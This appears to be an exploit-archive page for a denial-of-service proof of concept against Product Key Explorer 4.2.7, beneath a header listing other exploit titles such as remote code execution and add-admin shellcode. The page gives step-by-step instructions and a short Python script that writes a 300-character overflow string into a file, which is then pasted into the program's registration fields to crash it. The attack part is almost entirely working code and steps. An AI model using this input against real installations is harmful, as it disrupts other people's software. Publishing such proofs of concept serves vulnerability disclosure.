338282491b
8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
30 lines
No EOL
801 B
Python
Executable file
30 lines
No EOL
801 B
Python
Executable file
# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
|
|
# Exploit Author : Sinem Şahin
|
|
# Exploit Date: 2021-02-23
|
|
# Vendor Homepage : http://www.nsauditor.com/
|
|
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
|
|
# Version: 4.2.7
|
|
# Tested on: Windows 7 x64
|
|
|
|
|
|
# Steps:
|
|
1- Run the python script. (exploit.py)
|
|
2- Open payload.txt and copy content to clipboard.
|
|
3- Run 'Product Key Explorer 4.2.7'.
|
|
4- Register -> Enter Registration Code
|
|
5- Paste clipboard into the "Key" or "Name".
|
|
6- Click on OK.
|
|
7- Crashed.
|
|
|
|
---> exploit.py <--
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 300
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print "File created!"
|
|
except:
|
|
print "File cannot be created!!" |